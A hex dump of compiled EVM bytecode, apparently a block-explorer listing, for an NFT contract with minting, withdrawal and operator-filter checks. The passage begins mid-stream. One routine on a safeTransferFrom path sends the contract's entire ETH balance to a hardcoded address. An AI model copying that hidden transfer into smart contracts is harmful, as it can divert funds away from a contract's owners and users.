c565b9190505550600e6000438152602001908152602001600020600081548092919061104b90612c6c565b919050555061105b336001611666565b611094565b600b5481111561106f57600080fd5b600a548161107d9190612a8f565b34101561108957600080fd5b6110933382611666565b5b50565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156111a1576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161110f929190612856565b60206040518083038186803b15801561112757600080fd5b505afa15801561113b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061115f91906125fb565b6111a057806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401611197919061283b565b60405180910390fd5b5b6111ab8383611b29565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156112ff573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156112245761121f85858585611c34565b61130c565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161126d929190612856565b60206040518083038186803b15801561128557600080fd5b505afa158015611299573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112bd91906125fb565b6112fe57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016112f5919061283b565b60405180910390fd5b5b61130b85858585611c34565b5b5050505050565b606061131e826114be565b611354576040517fa14c4b5000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600061135e611ca7565b905060008151141561137f57604051806020016040528060008152506113aa565b8061138984611d39565b60405160200161139a929190612817565b6040516020818303038152906040525b915050919050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600f60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114a657600080fd5b81600a8190555080600b819055505050565b600b5481565b6000816114c9611661565b111580156114d8575060005482105b8015611516575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061152882610d13565b90508073ffffffffffffffffffffffffffffffffffffffff16611549611d92565b73ffffffffffffffffffffffffffffffffffffffff16146115ac5761157581611570611d92565b6113b8565b6115ab576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b611680828260405180602001604052806000815250611d9a565b5050565b600061168f82611a33565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16146116f6576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061170284611e37565b915091506117188187611713611d92565b611e5e565b6117645761172d86611728611d92565b6113b8565b611763576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614156117cb576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6117d88686866001611ea2565b80156117e357600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154600101919050819055506118b18561188d888887611ea8565b7c020000000000000000000000000000000000000000000000000000000017611ed0565b600460008681526020019081526020016000208190555060007c020000000000000000000000000000000000000000000000000000000084161415611939576000600185019050600060046000838152602001908152602001600020541415611937576000548114611936578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46119a18686866001611efb565b505050505050565b6000471115611a1257736cd7a43f488ac6009d818ad05fb08ba288f8383273ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611a0c573d6000803e3d6000fd5b50611a2e565b611a2d838383604051806020016040528060008152506111b0565b5b505050565b60008082905080611a42611661565b11611aca57600054811015611ac95760006004600083815260200190815260200160002054905060007c010000000000000000000000000000000000000000000000000000000082161415611ac7575b6000811415611abd576004600083600190039350838152602001908152602001600020549050611a92565b8092505050611afc565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b6000600c611b0d6108ab565b600954611b1a9190612ae9565b611b249190612a5e565b905090565b8060076000611b36611d92565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611be3611d92565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611c2891906128cb565b60405180910390a35050565b611c3f84848461092a565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611ca157611c6a84848484611f01565b611ca0576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060088054611cb690612c09565b80601f0160208091040260200160405190810160405280929190818152602001828054611ce290612c09565b8015611d2f5780601f10611d0457610100808354040283529160200191611d2f565b820191906000526020600020905b815481529060010190602001808311611d1257829003601f168201915b5050505050905090565b606060a060405101806040526020810391506000825281835b600115611d7d57600184039350600a81066030018453600a8104905080611d7857611d7d565b611d52565b50828103602084039350808452505050919050565b600033905090565b611da48383612061565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611e3257600080549050600083820390505b611de46000868380600101945086611f01565b611e1a576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611dd1578160005414611e2f57600080fd5b50505b505050565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611ebf86868461221e565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611f27611d92565b8786866040518563ffffffff1660e01b8152600401611f49949392919061287f565b602060405180830381600087803b158015611f6357600080fd5b505af1925050508015611f9457506040513d601f19601f82011682018060405250810190611f919190612655565b60015b61200e573d8060008114611fc4576040519150601f19603f3d011682016040523d82523d6000602084013e611fc9565b606091505b50600081511415612006576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60008054905060008214156120a2576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6120af6000848385611ea2565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550612126836121176000866000611ea8565b61212085612227565b17611ed0565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b8181146121c757808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a460018101905061218c565b506000821415612203576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060008190555050506122196000848385611efb565b505050565b60009392505050565b60006001821460e11b9050919050565b82805461224390612c09565b90600052602060002090601f01602090048101928261226557600085556122ac565b82601f1061227e57805160ff19168380011785556122ac565b828001600101855582156122ac579182015b828111156122ab578251825591602001919060010190612290565b5b5090506122b991906122bd565b5090565b5b808211156122d65760008160009055506001016122be565b5090565b60006122ed6122e884612963565b61293e565b90508281526020810184848401111561230957612308612d76565b5b612314848285612bc7565b509392505050565b600061232f61232a84612994565b61293e565b90508281526020810184848401111561234b5761234a612d76565b5b612356848285612bc7565b509392505050565b60008135905061236d81612d96565b92915050565b60008135905061238281612dad565b92915050565b60008151905061239781612dad565b92915050565b6000813590506123ac81612dc4565b92915050565b6000815190506123c181612dc4565b92915050565b600082601f8301126123dc576123db612d71565b5b81356123ec8482602086016122da565b91505092915050565b600082601f83011261240a57612409612d71565b5b813561241a84826020860161231c565b91505092915050565b60008135905061243281612ddb565b92915050565b60006020828403121561244e5761244d612d80565b5b600061245c8482850161235e565b91505092915050565b6000806040838503121561247c5761247b612d80565b5b600061248a8582860161235e565b925050602061249b8582860161235e565b9150509250929050565b6000806000606084860312156124be576124bd612d80565b5b60006124cc8682870161235e565b93505060206124dd8682870161235e565b92505060406124ee86828701612423565b9150509250925092565b6000806000806080858703121561251257612511612d80565b5b60006125208782880161235e565b94505060206125318782880161235e565b935050604061254287828801612423565b925050606085013567ffffffffffffffff81111561256357612562612d7b565b5b61256f878288016123c7565b91505092959194509250565b6000806040838503121561259257612591612d80565b5b60006125a08582860161235e565b92505060206125b185828601612373565b9150509250929050565b600080604083850312156125d2576125d1612d80565b5b60006125e08582860161235e565b92505060206125f185828601612423565b9150509250929050565b60006020828403121561261157612610612d80565b5b600061261f84828501612388565b91505092915050565b60006020828403121561263e5761263d612d80565b5b600061264c8482850161239d565b91505092915050565b60006020828403121561266b5761266a612d80565b5b6000612679848285016123b2565b91505092915050565b60006020828403121561269857612697612d80565b5b600082013567ffffffffffffffff8111156126b6576126b5612d7b565b5b6126c2848285016123f5565b91505092915050565b6000602082840312156126e1576126e0612d80565b5b60006126ef84828501612423565b91505092915050565b6000806040838503121561270f5761270e612d80565b5b600061271d85828601612423565b925050602061272e85828601612423565b9150509250929050565b61274181612b1d565b82525050565b61275081612b2f565b82525050565b6000612761826129c5565b61276b81856129db565b935061277b818560208601612bd6565b61278481612d85565b840191505092915050565b61279881612b91565b82525050565b60006127a9826129d0565b6127b381856129ec565b93506127c3818560208601612bd6565b6127cc81612d85565b840191505092915050565b60006127e2826129d0565b6127ec81856129fd565b93506127fc818560208601612bd6565b80840191505092915050565b61281181612b87565b82525050565b600061282382856127d7565b915061282f82846127d7565b91508190509392505050565b60006020820190506128506000830184612738565b92915050565b600060408201905061286b6000830185612738565b6128786020830184612738565b9392505050565b60006080820190506128946000830187612738565b6128a16020830186612738565b6128ae6040830185612808565b81810360608301526128c08184612756565b905095945050505050565b60006020820190506128e06000830184612747565b92915050565b60006020820190506128fb600083018461278f565b92915050565b6000602082019050818103600083015261291b818461279e565b905092915050565b60006020820190506129386000830184612808565b92915050565b6000612948612959565b90506129548282612c3b565b919050565b6000604051905090565b600067ffffffffffffffff82111561297e5761297d612d42565b5b61298782612d85565b9050602081019050919050565b600067ffffffffffffffff8211156129af576129ae612d42565b5b6129b882612d85565b9050602081019050919050565b600081519050919050565b600081519050919050565b600082825260208201905092915050565b600082825260208201905092915050565b600081905092915050565b6000612a1382612b87565b9150612a1e83612b87565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115612a5357612a52612cb5565b5b828201905092915050565b6000612a6982612b87565b9150612a7483612b87565b925082612a8457612a83612ce4565b5b828204905092915050565b6000612a9a82612b87565b9150612aa583612b87565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615612ade57612add612cb5565b5b828202905092915050565b6000612af482612b87565b9150612aff83612b87565b925082821015612b1257612b11612cb5565b5b828203905092915050565b6000612b2882612b67565b9050919050565b60008115159050919050565b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b6000612b9c82612ba3565b9050919050565b6000612bae82612bb5565b9050919050565b6000612bc082612b67565b9050919050565b82818337600083830152505050565b60005b83811015612bf4578082015181840152602081019050612bd9565b83811115612c03576000848401525b50505050565b60006002820490506001821680612c2157607f821691505b60208210811415612c3557612c34612d13565b5b50919050565b612c4482612d85565b810181811067ffffffffffffffff82111715612c6357612c62612d42565b5b80604052505050565b6000612c7782612b87565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff821415612caa57612ca9612cb5565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b612d9f81612b1d565b8114612daa57600080fd5b50565b612db681612b2f565b8114612dc157600080fd5b50565b612dcd81612b3b565b8114612dd857600080fd5b50565b612de481612b87565b8114612def57600080fd5b5056fea2646970667358221220453e59b93aa5269120fea73b9bc55692a63e9e00ff3870a9f27e76d82bb4cdd964736f6c63430008070033697066733a2f2f62616679626569687833796e69796f6f7562757032686172776f3334773337693533676734616d7a7a326277646f776d6b6177727534346f6f33652f

Deployed Bytecode

0x6080604052600436106101815760003560e01c80636c0360eb116100d1578063a22cb4651161008a578063d5abeb0111610064578063d5abeb011461052d578063e985e9c514610558578063f7d9757714610595578063f968adbe146105be57610181565b8063a22cb465146104ab578063b88d4fde146104d4578063c87b56dd146104f057610181565b80636c0360eb146103a657806370a08231146103d15780638da5cb5b1461040e57806395d89b4114610439578063a035b1fe14610464578063a0712d681461048f57610181565b80631fed285a1161013e57806341f434341161011857806341f43434146102f957806342842e0e1461032457806355f804b3146103405780636352211e1461036957610181565b80631fed285a1461029d57806323b872dd146102c65780633ccfd60b146102e257610181565b806301ffc9a714610186578063036a7b5a146101c357806306fdde03146101ee578063081812fc14610219578063095ea7b31461025657806318160ddd14610272575b600080fd5b34801561019257600080fd5b506101ad60048036038101906101a89190612628565b6105e9565b6040516101ba91906128cb565b60405180910390f35b3480156101cf57600080fd5b506101d861067b565b6040516101e59190612923565b60405180910390f35b3480156101fa57600080fd5b50610203610681565b6040516102109190612901565b60405180910390f35b34801561022557600080fd5b50610240600480360381019061023b91906126cb565b610713565b60405161024d919061283b565b60405180910390f35b610270600480360381019061026b91906125bb565b610792565b005b34801561027e57600080fd5b506102876108ab565b6040516102949190612923565b60405180910390f35b3480156102a957600080fd5b506102c460048036038101906102bf91906125bb565b6108c2565b005b6102e060048036038101906102db91906124a5565b61092a565b005b3480156102ee57600080fd5b506102f7610a8a565b005b34801561030557600080fd5b5061030e610b2d565b60405161031b91906128e6565b60405180910390f35b61033e600480360381019061033991906124a5565b610b3f565b005b34801561034c57600080fd5b5061036760048036038101906103629190612682565b610c9f565b005b34801561037557600080fd5b50610390600480360381019061038b91906126cb565b610d13565b60405161039d919061283b565b60405180910390f35b3480156103b257600080fd5b506103bb610d25565b6040516103c89190612901565b60405180910390f35b3480156103dd57600080fd5b506103f860048036038101906103f39190612438565b610db3565b6040516104059190612923565b60405180910390f35b34801561041a57600080fd5b50610423610e6c565b604051610430919061283b565b60405180910390f35b34801561044557600080fd5b5061044e610e92565b60405161045b9190612901565b60405180910390f35b34801561047057600080fd5b50610479610f24565b6040516104869190612923565b60405180910390f35b6104a960048036038101906104a491906126cb565b610f2a565b005b3480156104b757600080fd5b506104d260048036038101906104cd919061257b565b611097565b005b6104ee60048036038101906104e991906124f8565b6111b0565b005b3480156104fc57600080fd5b50610517600480360381019061051291906126cb565b611313565b6040516105249190612901565b60405180910390f35b34801561053957600080fd5b506105426113b2565b60405161054f9190612923565b60405180910390f35b34801561056457600080fd5b5061057f600480360381019061057a9190612465565b6113b8565b60405161058c91906128cb565b60405180910390f35b3480156105a157600080fd5b506105bc60048036038101906105b791906126f8565b61144c565b005b3480156105ca57600080fd5b506105d36114b8565b6040516105e09190612923565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061064457506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806106745750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b600c5481565b60606002805461069090612c09565b80601f01602080910402602001604051908101604052809291908181526020018280546106bc90612c09565b80156107095780601f106106de57610100808354040283529160200191610709565b820191906000526020600020905b8154815290600101906020018083116106ec57829003601f168201915b5050505050905090565b600061071e826114be565b610754576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561089c576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161080a929190612856565b60206040518083038186803b15801561082257600080fd5b505afa158015610836573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061085a91906125fb565b61089b57806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610892919061283b565b60405180910390fd5b5b6108a6838361151d565b505050565b60006108b5611661565b6001546000540303905090565b3373ffffffffffffffffffffffffffffffffffffffff16600f60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461091c57600080fd5b6109268282611666565b5050565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610a78573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141561099d57610998848484611684565b610a84565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016109e6929190612856565b60206040518083038186803b1580156109fe57600080fd5b505afa158015610a12573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a3691906125fb565b610a7757336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610a6e919061283b565b60405180910390fd5b5b610a83848484611684565b5b50505050565b3373ffffffffffffffffffffffffffffffffffffffff16600f60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610ae457600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015610b2a573d6000803e3d6000fd5b50565b6daaeb6d7670e522a718067333cd4e81565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610c8d573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610bb257610bad8484846119a9565b610c99565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610bfb929190612856565b60206040518083038186803b158015610c1357600080fd5b505afa158015610c27573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c4b91906125fb565b610c8c57336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610c83919061283b565b60405180910390fd5b5b610c988484846119a9565b5b50505050565b3373ffffffffffffffffffffffffffffffffffffffff16600f60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610cf957600080fd5b8060089080519060200190610d0f929190612237565b5050565b6000610d1e82611a33565b9050919050565b60088054610d3290612c09565b80601f0160208091040260200160405190810160405280929190818152602001828054610d5e90612c09565b8015610dab5780601f10610d8057610100808354040283529160200191610dab565b820191906000526020600020905b815481529060010190602001808311610d8e57829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610e1b576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b67ffffffffffffffff600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054169050919050565b600f60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b606060038054610ea190612c09565b80601f0160208091040260200160405190810160405280929190818152602001828054610ecd90612c09565b8015610f1a5780601f10610eef57610100808354040283529160200191610f1a565b820191906000526020600020905b815481529060010190602001808311610efd57829003601f168201915b5050505050905090565b600a5481565b60095481610f366108ab565b610f409190612a08565b1115610f4b57600080fd5b600034141561106057600181148015610f7d5750610f67611b01565b600e600043815260200190815260200160002054105b8015610fc95750600c54600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b610fd257600080fd5b600d60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081548092919061102290612c6c565b9190505550600e6000438152602001908152602001600020600081548092919061104b90612c6c565b919050555061105b336001611666565b611094565b600b5481111561106f57600080fd5b600a548161107d9190612a8f565b34101561108957600080fd5b6110933382611666565b5b50565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156111a1576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b815260040161110f929190612856565b60206040518083038186803b15801561112757600080fd5b505afa15801561113b573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061115f91906125fb565b6111a057806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401611197919061283b565b60405180910390fd5b5b6111ab8383611b29565b505050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156112ff573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156112245761121f85858585611c34565b61130c565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161126d929190612856565b60206040518083038186803b15801561128557600080fd5b505afa158015611299573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906112bd91906125fb565b6112fe57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016112f5919061283b565b60405180910390fd5b5b61130b85858585611c34565b5b5050505050565b606061131e826114be565b611354576040517fa14c4b5000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600061135e611ca7565b905060008151141561137f57604051806020016040528060008152506113aa565b8061138984611d39565b60405160200161139a929190612817565b6040516020818303038152906040525b915050919050565b60095481565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b3373ffffffffffffffffffffffffffffffffffffffff16600f60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114a657600080fd5b81600a8190555080600b819055505050565b600b5481565b6000816114c9611661565b111580156114d8575060005482105b8015611516575060007c0100000000000000000000000000000000000000000000000000000000600460008581526020019081526020016000205416145b9050919050565b600061152882610d13565b90508073ffffffffffffffffffffffffffffffffffffffff16611549611d92565b73ffffffffffffffffffffffffffffffffffffffff16146115ac5761157581611570611d92565b6113b8565b6115ab576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b826006600084815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b611680828260405180602001604052806000815250611d9a565b5050565b600061168f82611a33565b90508373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16146116f6576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b60008061170284611e37565b915091506117188187611713611d92565b611e5e565b6117645761172d86611728611d92565b6113b8565b611763576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614156117cb576040517fea553b3400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6117d88686866001611ea2565b80156117e357600082555b600560008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600081546001900391905081905550600560008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008154600101919050819055506118b18561188d888887611ea8565b7c020000000000000000000000000000000000000000000000000000000017611ed0565b600460008681526020019081526020016000208190555060007c020000000000000000000000000000000000000000000000000000000084161415611939576000600185019050600060046000838152602001908152602001600020541415611937576000548114611936578360046000838152602001908152602001600020819055505b5b505b838573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46119a18686866001611efb565b505050505050565b6000471115611a1257736cd7a43f488ac6009d818ad05fb08ba288f8383273ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015611a0c573d6000803e3d6000fd5b50611a2e565b611a2d838383604051806020016040528060008152506111b0565b5b505050565b60008082905080611a42611661565b11611aca57600054811015611ac95760006004600083815260200190815260200160002054905060007c010000000000000000000000000000000000000000000000000000000082161415611ac7575b6000811415611abd576004600083600190039350838152602001908152602001600020549050611a92565b8092505050611afc565b505b5b6040517fdf2d9b4200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b919050565b6000600c611b0d6108ab565b600954611b1a9190612ae9565b611b249190612a5e565b905090565b8060076000611b36611d92565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611be3611d92565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611c2891906128cb565b60405180910390a35050565b611c3f84848461092a565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611ca157611c6a84848484611f01565b611ca0576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b5b50505050565b606060088054611cb690612c09565b80601f0160208091040260200160405190810160405280929190818152602001828054611ce290612c09565b8015611d2f5780601f10611d0457610100808354040283529160200191611d2f565b820191906000526020600020905b815481529060010190602001808311611d1257829003601f168201915b5050505050905090565b606060a060405101806040526020810391506000825281835b600115611d7d57600184039350600a81066030018453600a8104905080611d7857611d7d565b611d52565b50828103602084039350808452505050919050565b600033905090565b611da48383612061565b60008373ffffffffffffffffffffffffffffffffffffffff163b14611e3257600080549050600083820390505b611de46000868380600101945086611f01565b611e1a576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b818110611dd1578160005414611e2f57600080fd5b50505b505050565b60008060006006600085815260200190815260200160002090508092508254915050915091565b600073ffffffffffffffffffffffffffffffffffffffff8316925073ffffffffffffffffffffffffffffffffffffffff821691508382148383141790509392505050565b50505050565b60008060e883901c905060e8611ebf86868461221e565b62ffffff16901b9150509392505050565b600073ffffffffffffffffffffffffffffffffffffffff83169250814260a01b178317905092915050565b50505050565b60008373ffffffffffffffffffffffffffffffffffffffff1663150b7a02611f27611d92565b8786866040518563ffffffff1660e01b8152600401611f49949392919061287f565b602060405180830381600087803b158015611f6357600080fd5b505af1925050508015611f9457506040513d601f19601f82011682018060405250810190611f919190612655565b60015b61200e573d8060008114611fc4576040519150601f19603f3d011682016040523d82523d6000602084013e611fc9565b606091505b50600081511415612006576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614915050949350505050565b60008054905060008214156120a2576040517fb562e8dd00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6120af6000848385611ea2565b600160406001901b178202600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550612126836121176000866000611ea8565b61212085612227565b17611ed0565b6004600083815260200190815260200160002081905550600080838301905073ffffffffffffffffffffffffffffffffffffffff85169150828260007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a4600183015b8181146121c757808360007fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600080a460018101905061218c565b506000821415612203576040517f2e07630000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060008190555050506122196000848385611efb565b505050565b60009392505050565b60006001821460e11b9050919050565b82805461224390612c09565b90600052602060002090601f01602090048101928261226557600085556122ac565b82601f1061227e57805160ff19168380011785556122ac565b828001600101855582156122ac579182015b828111156122ab578251825591602001919060010190612290565b5b5090506122b991906122bd565b5090565b5b808211156122d65760008160009055506001016122be565b5090565b60006122ed6122e884612963565b61293e565b90508281526020810184848401111561230957612308612d76565b5b